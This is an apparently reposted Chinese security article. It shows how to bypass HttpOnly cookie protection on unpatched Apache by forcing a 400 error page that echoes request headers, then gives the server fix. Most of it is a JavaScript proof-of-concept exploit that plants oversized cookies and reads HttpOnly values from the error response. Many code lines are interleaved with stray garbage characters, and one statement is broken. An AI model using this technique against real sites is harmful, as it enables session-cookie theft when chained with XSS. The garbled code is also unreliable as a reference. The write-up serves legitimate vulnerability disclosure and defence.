很多程序以及一些商业或成熟的开源 CMS 文章系统，为了防止 XSS 窃取用户 cookie，一般都会给 cookie 加上 HttpOnly 属性，禁止 JS 直接读取用户的 cookie，从而降低 XSS 的危害；而本文讨论的这个问题恰好可以用来绕过 cookie 的 HttpOnly 属性。
用 Chrome 打开一个站点，按 F12 打开开发者工具，切换到 Console 并输入如下代码，然后回车：
// Source of this proof-of-concept: http://www.exploit-db.com/exploits/18442/
//
// setCookies(good)
//   good truthy (setCookies(true)): expires the ten cookies "xss0".."xss9" by
//     re-writing each with an Expires date one millisecond in the past.
//   good falsy or omitted (setCookies()): writes the ten cookies "xss0".."xss9",
//     each 819 bytes of "x", with path=/ on the current origin via document.cookie.
// The write-up below reports that the resulting oversized Cookie request header
// makes an unpatched Apache answer 400 with an error page that echoes the request's
// Cookie header, HttpOnly cookies included.
// Defender notes: the weakness is the server's error page reflecting request
// headers, not HttpOnly itself; the write-up's mitigations are a custom
// `ErrorDocument 400` message or upgrading Apache. A burst of 400 responses to one
// client caused by an oversized Cookie header is a usable detection signal.
function setCookies (good) {
( R- N3 _/ O. W" ~+ F// Construct string for cookie value
& i3 n0 r4 C6 @% r4 F! Nvar str = "";
// 819 iterations -> 819 bytes of "x" per cookie value.
6 q4 `+ y' u" s1 nfor (var i=0; i< 819; i++) {
% ]( s# [- }9 cstr += "x";" n! I: H4 ~) M0 }7 x
}
6 q- f6 d$ h7 n// Set cookies
// `i` is function-scoped (declared by the loop above) and is simply reused here.
! G( F0 z4 Z$ t% n" R7 Ifor (i = 0; i < 10; i++) {
' q m) H' }, q4 Z! w" X$ }// Expire evil cookie
! k( k5 D1 H3 S% H9 eif (good) {
// Expires = now - 1 ms, so the browser drops the cookie.
, W* n% X4 W. h/ ^& V1 m- Kvar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";5 ?9 E9 z$ U) }% f* S
}1 P( h2 n2 V* m) J
// Set evil cookie
else {
2 n" B/ K6 ?. b+ t/ Zvar cookie = "xss"+i+"="+str+";path=/";
8 j8 o0 g5 _$ h}9 N* g o9 v" k1 j0 c$ e8 Y
// Both `var cookie` declarations above refer to the same function-scoped binding.
document.cookie = cookie;0 } h1 n* U) d6 }9 I
}
& M5 W" @0 W ~; A4 Y}
// makeRequest()
//   1. Calls setCookies() with no argument, which plants the ten oversized "xss" cookies.
//   2. Issues an asynchronous XHR GET to "/" on the current origin.
//   3. parseCookies (the readystatechange handler) acts only once the response is
//      complete (readyState 4) with status 400: it strips CR/LF from the body, takes
//      the text between the first <pre> and the last </pre>, drops the "Cookie: "
//      prefix and the planted xss cookies, splits the remainder on ";", expires the
//      planted cookies via setCookies(true), and alerts the collected pairs as JSON.
// Everything stays in the user's own browser (alert); no data is sent anywhere else.
// NOTE(review): the handler relies on the 400 error page carrying the request headers
// inside a <pre> element — the write-up attributes that behaviour to unpatched Apache.
- z0 a! j l) j: ~function makeRequest() {
6 X8 J0 }6 K+ h2 @setCookies();* P" _+ `; v( {9 a2 p4 Z, ]
function parseCookies () {5 h( F8 W6 {6 |' }# @
var cookie_dict = {};
: e2 w j+ e" A* q// Only react on 400 status
2 n1 Z: S+ E' Bif (xhr.readyState === 4 && xhr.status === 400) {
l" o( w U! {, _// Replace newlines and match <pre> content
// NOTE(review): match() returns null when no <pre> block is present; the .length
// test below then throws, and setCookies(true) never runs, so the oversized
// cookies stay set in the browser.
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);$ y3 M, C. m" k$ \" O1 E' j3 U
if (content.length) {6 h1 r8 S/ A3 z, Z+ A+ Q- A
// Remove Cookie: prefix
$ M) I3 N6 F2 a" Scontent = content[1].replace("Cookie: ", "");; `5 V) F! c6 G: S4 M1 X' R+ ?
// The planted cookies match /xss\d=x+;?/ and are removed before splitting on ";".
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
3 A7 N; ]! v, X y3 i \" N// Add cookies to object
for (var i=0; i<cookies.length; i++) {5 q# Q; n5 y# G5 z. N1 a D3 U* T% h2 {
// NOTE(review): `cookies` is an array here (result of the split above), which has
// no split method, so this statement throws a TypeError as written.
var s_c = cookies.split('=',2);) @' p; o0 ^) D
cookie_dict[s_c[0]] = s_c[1];
J: F. R3 j' R. U2 Q2 `}
3 _, F9 m% I1 u. ^2 O0 Y# Y}5 G. D! r: J- ?* J
// Unset malicious cookies
" c# ?3 R) k, qsetCookies(true);
* t# Y0 H! e+ A P Ialert(JSON.stringify(cookie_dict));+ B$ ]+ U. ^: n) b* B
}
, ^8 a8 @3 u! b8 h) i}
+ ?1 F# v( M9 @$ m// Make XHR request
// `xhr` is read inside parseCookies above; `var` hoisting makes the binding exist
// there, and the handler only fires after this assignment.
0 C1 t. B3 V+ E4 e$ _& a. Nvar xhr = new XMLHttpRequest();
& X: E1 a6 y/ K+ P& |xhr.onreadystatechange = parseCookies;- a: L7 l. [6 u i3 `
xhr.open("GET", "/", true);
& r: _9 L" |( F/ m* t2 gxhr.send(null);
+ e3 J9 P. w% x, C) D6 N5 D9 {}
// Entry point: runs the whole sequence immediately when pasted into the console.
6 w# ?6 n8 o. umakeRequest();
你就能看见华丽丽的 400 错误页面中包含着 cookie 信息。
下载地址：https://gist.github.com/pilate/1955a1c28324d4724b7b/download
修复方案：
Apache 官方提供 4 种错误处理方式（http://httpd.apache.org/docs/2.0/mod/core.html#errordocument），如下：
In the event of a problem or error, Apache can be configured to do one of four things:
1. output a simple hardcoded error message（输出一个简单生硬的错误信息）
2. output a customized message（输出一段自定义信息）
3. redirect to a local URL-path to handle the problem/error（转向一个本地的自定义页面）
4. redirect to an external URL to handle the problem/error（转向一个外部 URL）
经测试，对于 400 错误只有方法 2 有效：使用它之后，响应包中不会再包含 cookie 内容。
Apache 配置：

ErrorDocument 400 "security test"
当然，把 Apache 升级到最新版本也可以 :)。
参考：http://httpd.apache.org/security/vulnerabilities_22.html